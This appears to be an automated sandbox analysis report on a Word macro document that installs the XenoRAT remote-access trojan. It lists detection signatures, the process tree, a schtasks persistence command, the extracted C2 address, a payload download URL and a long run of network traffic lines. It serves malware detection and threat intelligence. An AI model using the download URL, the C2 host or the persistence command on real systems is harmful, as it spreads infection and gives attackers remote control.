Edit tour

Windows Analysis Report
yIla7SeJ6r.doc

Overview

General Information

Sample name:	yIla7SeJ6r.doc renamed because original name is a hash value
Original sample name:	26973056c194b68b10d1c2b9a632a27e.doc
Analysis ID:	1569823
MD5:	26973056c194b68b10d1c2b9a632a27e
SHA1:	0b61132df948c4d48e81b631bdad91be1080f530
SHA256:	4a58b228b23cdc286d103115b2fb312eedf6741aeada17b242620b6737db1035
Tags:	docRATXenoRATuser-abuse_ch
Infos:

Detection

XenoRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for dropped file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected XenoRAT

.NET source code contains potential unpacker

.NET source code contains process injector

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with hexadecimal encoded strings

Document contains an embedded VBA with many randomly named variables

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Office process drops PE file

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

MDEODF.exe (PID: 3772 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3812 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe" MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3948 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3964 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3996 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3820 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

schtasks.exe (PID: 3956 cmdline: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

MDEODF.exe (PID: 3848 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

taskeng.exe (PID: 3084 cmdline: taskeng.exe {4070AE52-7E9D-44E5-8168-5CF4F89E1764} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

MDEODF.exe (PID: 3168 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3216 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 3320 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

MDEODF.exe (PID: 976 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XenoRAT		No Attribution	https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/ https://github.com/moom825/xeno-rat https://hunt.io/blog/good-game-gone-bad-xeno-rat-spread-via-gg-domains-and-github https://hunt.io/blog/xenorat-excel-xll-confuserex-as-access-method	https://malpedia.caad.fkie.fraunhofer.de/details/win.xenorat

Malware Configuration

Threatname: XenoRAT

{"C2 url": "87.120.120.27", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
00000008.00000002.380210454.0000000002411000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
00000011.00000002.393953865.0000000002207000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
00000004.00000002.375878692.00000000020F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
Process Memory Space: MDEODF.exe PID: 3772	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
Process Memory Space: MDEODF.exe PID: 3812	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
Process Memory Space: MDEODF.exe PID: 3884	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
Process Memory Space: MDEODF.exe PID: 3168	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.MDEODF.exe.2419b5c.1.unpack	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
5.2.MDEODF.exe.400000.0.unpack	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
4.2.MDEODF.exe.201a318.4.unpack	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
8.2.MDEODF.exe.2419b5c.1.raw.unpack	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security
4.2.MDEODF.exe.201a318.4.raw.unpack	JoeSecurity_XenoRAT	Yara detected XenoRAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3556, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , ProcessId: 3772, ProcessName: MDEODF.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3556, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , ProcessId: 3772, ProcessName: MDEODF.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentProcessId: 3820, ParentProcessName: MDEODF.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, ProcessId: 3956, ProcessName: schtasks.exe

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 87.121.86.205, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3556, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentProcessId: 3820, ParentProcessName: MDEODF.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, ProcessId: 3956, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE [ANY.RUN] Xeno-RAT TCP Check-In

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T10:30:33.399094+0100	2050110	1	Malware Command and Control Activity Detected	87.120.120.27	2222	192.168.2.22	49170	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: yIla7SeJ6r.doc

Avira: detected

Antivirus detection for URL or domain

Source: https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\~WRD0000.tmp

Avira: detection malicious, Label: HEUR/Macro.Downloader.PBJD.Gen

Found malware configuration

Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack

Malware Configuration Extractor: XenoRAT {"C2 url": "87.120.120.27", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	ReversingLabs: Detection: 47%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\~WRD0000.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yIla7SeJ6r.doc

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: brtyhdrh[1].exe.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4x nop then jmp 002D17B0h	5_2_002D0B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4x nop then jmp 003017B0h	6_2_00300B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_00308872
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_0030D719
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 4x nop then jmp 003017B0h	9_2_00300B60
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 4x nop then jmp 001C17B0h	11_2_001C0B60
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 4x nop then jmp 003617B0h	12_2_00360B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4x nop then jmp 001C17B0h	18_2_001C0B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4x nop then jmp 001C17B0h	19_2_001C0B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4x nop then jmp 001C17B0h	20_2_001C0B60

Source: global traffic

DNS query: name: www.stipamana.com

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
